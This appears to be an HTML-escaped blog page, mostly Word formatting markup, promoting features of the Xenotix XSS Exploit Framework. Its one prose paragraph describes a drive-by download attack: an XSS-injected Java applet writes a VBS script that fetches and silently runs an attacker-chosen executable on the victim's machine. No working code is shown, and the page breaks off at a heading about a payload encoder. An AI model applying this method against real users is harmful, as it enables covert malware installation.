  &lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:8.0pt;
 mso-para-margin-left:0in;
 line-height:107%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:"Times New Roman";
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;[VIDEO] &lt;a href="https://www.youtube.com/watch?v=owfF9C_Xerw"&gt;https://www.youtube.com/watch?v=owfF9C_Xerw&lt;/a&gt; [/VIDEO]&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&amp;nbsp;

&lt;/b&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;

&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS Executable Drive-by Downloader&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;a href="http://oi45.tinypic.com/4q565v.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://oi45.tinypic.com/4q565v.jpg" height="296" width="400" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&amp;nbsp;

&lt;/b&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;

&lt;/span&gt;&lt;/b&gt;&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Java
Drive-by download can be implemented with Xenotix XSS Exploit Framework. It
allows the attacker to download and run a malicious executable file on the victim’s
system without his knowledge and permission. You have to specify the URL for the
malicious executable and then embed the drive-by implemented webpage into a XSS
vulnerable page and serve your victim. When the victim view the injected page,
the java applet client.jar will access the command prompt and with the help of
echo command, write down some scripts to a Visual basic script file named
winconfig.vbs in the temp directory(%temp%) and then the cmd.exe will start
winconfig.vbs. The winconfig.vbs will download the malicious executable
specified by you in the URL to temp directory and rename it as update.exe and
finally it will execute update.exe. The downloading and executing of the
malicious executable happened without the knowledge and permission of the
victim.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;
&lt;/span&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val="Cambria Math"/&gt;
   &lt;m:brkBin m:val="before"/&gt;
   &lt;m:brkBinSub m:val="--"/&gt;
   &lt;m:smallFrac m:val="off"/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val="0"/&gt;
   &lt;m:rMargin m:val="0"/&gt;
   &lt;m:defJc m:val="centerGroup"/&gt;
   &lt;m:wrapIndent m:val="1440"/&gt;
   &lt;m:intLim m:val="subSup"/&gt;
   &lt;m:naryLim m:val="undOvr"/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
  LatentStyleCount="267"&gt;
  &lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;
  &lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;
  &lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;
  &lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;
  &lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"
   UnhideWhenUsed="false" Name="Table Grid"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;
  &lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;
  &lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:8.0pt;
 mso-para-margin-left:0in;
 line-height:107%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:"Times New Roman";
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;[VIDEO] &lt;a href="https://www.youtube.com/watch?v=i8c3kf4t6A8"&gt;https://www.youtube.com/watch?v=i8c3kf4t6A8&lt;/a&gt;
[/VIDEO]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;

&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS Payload Encoder&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;

